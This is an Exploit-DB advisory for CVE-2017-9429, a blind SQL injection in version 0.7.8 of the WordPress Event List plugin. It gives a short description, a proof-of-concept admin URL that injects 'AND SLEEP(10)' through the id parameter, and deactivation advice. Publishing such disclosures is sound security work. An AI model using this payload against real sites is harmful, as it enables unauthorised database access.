WordPress Plugin Event List <= 0.7.8

EDB-ID: 42173
Author: Dimitrios Tsagkarakis
Published: 2017-06-04
CVE: CVE-2017-9429
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 04-06-2017 
 # Exploit Author: Dimitrios Tsagkarakis 
 # Website: dtsa.eu  
 # Software Link: https://wordpress.org/plugins/event-list/ 
 # Version: 0.7.8 
 # CVE : CVE-2017-9429 
 # Category: webapps 
  
   
  
 1. Description: 
  
     
  
 SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress 
 allows an authenticated user to execute arbitrary SQL commands via the id 
 parameter to wp-admin/admin.php.  
  
   
  
 2. Proof of Concept: 
  
   
  
 http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id 
 =1 AND SLEEP(10) 
  
   
  
 3. Solution: 
  
     
  
 The plugin has been removed from WordPress. Deactivate the plug-in and wait 
 for a hotfix. 
  
   
  
 4. Reference: 
  
   
  
 http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje 
 ction-sqli/ 
  
 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

Source: www.exploit-db.com

Exploit Collector

Search Exploit

WordPress Plugin Event List <= 0.7.8 - SQL Injection